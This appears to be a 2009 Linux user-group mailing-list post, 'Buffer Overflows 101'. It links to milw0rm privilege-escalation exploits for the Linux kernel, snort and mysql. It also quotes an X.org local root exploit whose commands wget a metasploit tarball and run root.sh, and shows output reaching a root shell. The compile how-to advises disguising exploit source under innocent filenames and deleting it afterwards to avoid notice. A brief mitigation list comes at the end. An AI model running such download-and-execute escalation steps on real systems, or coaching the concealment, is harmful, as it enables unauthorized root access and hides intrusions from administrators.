Buffer Overflows 101
Good List (from the Backtrack3 Web Archives):
http://milw0rm.com/platforms/linux
Practical Examples:
1) linux kernel Exploits
http://milw0rm.com/exploits/2031
Affects
2.6.13 && < 2.6.17.4
Just one of many available buffer overflows in linux - to escalate privileges to root:
2) snort
http://milw0rm.com/exploits/3609
3) mysql
http://milw0rm.com/exploits/1518
4) Known Ubuntu 8.10 Overflows:
http://news.softpedia.com/news/Linux-Kernel-Vulnerability-in-Ubuntu-8-10-Update-Today-97543.shtml
Exploit file from http://milw0rm.com/exploits/1596
--------------------------------------------------------------------------------
# From Daniel Stone's Advisory
# xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates
# of X11R7.0, is vulnerable.
# X11R6.9.0, and all release candidates, are vulnerable.
# X11R6.8.2 and earlier versions are not vulnerable.
# The rest is H D Moore from metasploit
Two second exploit, but if anyone is lazy:
$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c
X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...
# backup: http://www.milw0rm.com/sploits/xmodulepath.tgz
# milw0rm.com [2006-03-20]
---------------------------------end original example-------------------------------
REMEMBER! All scripts are disabled and obfuscated so they are only available to those who are intelligent enough to also be ETHICAL. If you are too clueless to use this script, you are not clueful enough to stay out of trouble (jail, $myservers, schools, .edu, .gov, etc.). So if you can't read and comment that script, you can't run it.
General C How To:
You will need to copy the code to the server of choice. Cut and splice will work, unless you are using a Windows systems (beware of glowing ^M's!). We are going to copy it to a filename.c that obfuscates it's true function, like testfile.c and compile it to something like "grepfile" like a real $badguy would.
Once you have the source code on the test server in our practical example, you are going to need to compile it.
$ gcc -o grepfile test.c
If your file is named test.c then type '-o grepfile'
as the parameter to gcc. This is basically your suggested name
for the executable file that gcc would create. In case you typed
something like the following
$ gcc test.c
You would be having a a.out in the same directory as the source
C file. This is the default name of the executable that gcc creates.
This would create problems when you compile many programs in one
directory. So you override this with the -o option followed by
the name of the executable
$ gcc -o grepfile2 test2.c
Would create an executable by the name grepfile2 for your source
code named test2.c
Running the executable that you created is as simple as typing
the following at the prompt.
$ ./grepfile
OR
$ ./grepfile2
It's a good idea to remove your .c source after building so that your directory looks innocent like a $badguy would.
After your code runs, you should have a fine shell.
I was able to run the mysql example on the December HackFest Fedora Core 10 system successfully to obtain root Mysql privileges (instructions for build in the script.)
I was also able to run the X11 script. Be careful - it will restart X on Redhat or FC 10!. It works on unpatched Ubuntu 8.10!
All you would need is "access" to a shell for buffer overflow exploits.
Mitigating Buffer Overflows
1) Remove gcc, cc, and gdb
2) Be sure that the kernel running has /proc/kernel buffer overflow protections
3) NX (no execute) kernel patch protection for older kernels [know your version vulnerabilities]
4) SSH externally off; internal trust and access severely limited
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux BT3] Pill and leave the InSecurity Matrix, or take the Blue MS Pill and stay happily ignorant.
Suspicious message? There’s an alert for that. Get your Hotmail® account now.